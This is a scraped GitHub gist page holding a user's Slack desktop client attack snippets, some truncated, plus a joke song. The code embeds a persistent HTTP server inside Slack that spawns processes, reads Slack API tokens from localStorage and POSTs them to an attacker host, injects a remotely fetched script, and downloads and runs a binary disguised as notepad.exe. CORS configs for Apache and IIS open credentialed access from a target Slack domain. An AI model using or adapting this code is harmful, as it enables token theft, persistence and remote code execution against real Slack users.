Skip to content

Instantly share code, notes, and snippets.

Avatar

Jonny Schnittger JonnySchnittger

View GitHub Profile
@JonnySchnittger
JonnySchnittger / server.embed.js
Created Jul 17, 2019
Embed a http server for persistence within Slack
View server.embed.js
document.addEventListener("DOMContentLoaded", function () {
const http = require('http');
const url = require('url');
const { spawnSync } = require('child_process');
const port = 7000;
const contentType = { "Content-Type": "text/plain" };
const httpVerb = {
GET: "GET",
POST: "POST"
@JonnySchnittger
JonnySchnittger / localstorage.js
Created Jul 17, 2019
Grab the API tokens and send them back
View localstorage.js
for (var i = 0; i < localStorage.length; i++){
let key = localStorage.key(i);
if(key.endsWith('static_translations')) {
fetch('https://evil.hacker.domain.local', { method: 'POST', body: JSON.parse(localStorage.getItem(key)).data.args.token });
} else if(key.startsWith('xox')){
fetch('https://evil.hacker.domain.local', { method: 'POST', body: key });
}
}
@JonnySchnittger
JonnySchnittger / script.payload.js
Created Jul 17, 2019
JavaScript payload injection
View script.payload.js
document.addEventListener("DOMContentLoaded", function () {
const { webFrame } = require('electron')
const https = require("https");
const remoteUri = 'https://evil.hacker.domain.local/payload.js';
let execute = function(script) {
webFrame.executeJavaScript(script)
};
@JonnySchnittger
JonnySchnittger / .htaccess
Created Jul 17, 2019
CORS configuration for Apache
View .htaccess
Header Set Access-Control-Allow-Origin "https://<your target domain>.slack.com"
Header Set Access-Control-Allow-Methods" value="GET, PUT, POST, DELETE"
Header Set Access-Control-Allow-Credentials value="true"
@JonnySchnittger
JonnySchnittger / web.config
Created Jul 17, 2019
CORS configuration for IIS
View web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<httpProtocol>
<customHeaders>
<add name="Access-Control-Allow-Origin" value="https://<your target domain>.slack.com" />
<add name="Access-Control-Allow-Methods" value="GET, PUT, POST, DELETE" />
<add name="Access-Control-Allow-Credentials" value="true" />
</customHeaders>
</httpProtocol>
@JonnySchnittger
JonnySchnittger / payload.js
Last active Jul 17, 2019
Download and execute a binary payload
View payload.js
document.addEventListener("DOMContentLoaded", function () {
const { spawn } = require('child_process');
const fs = require('fs-extra');
const path = require('path');
const fileName = 'notepad.exe';
const localPath = path.join(process.cwd(), fileName);
const remoteUri = 'https://evil.hacker.domain.local/payload.exe';
let saveAndLaunch = function(download) {
@JonnySchnittger
JonnySchnittger / notepad.js
Last active Jul 17, 2019
launch notepad.exe when Slack loads
View notepad.js
document.addEventListener("DOMContentLoaded", function () {
const { spawn } = require('child_process');
const subprocess = spawn('notepad.exe', [], {
detached: true,
stdio: 'ignore'
});
subprocess.unref();
});
View hacker, hacker, hacker
To the theme music of Badger, Badger, Badger
https://www.youtube.com/watch?v=EIyixC9NsLI
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker
0-day, 0-day,
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker
0-day, 0-day,
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker
0-day,
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker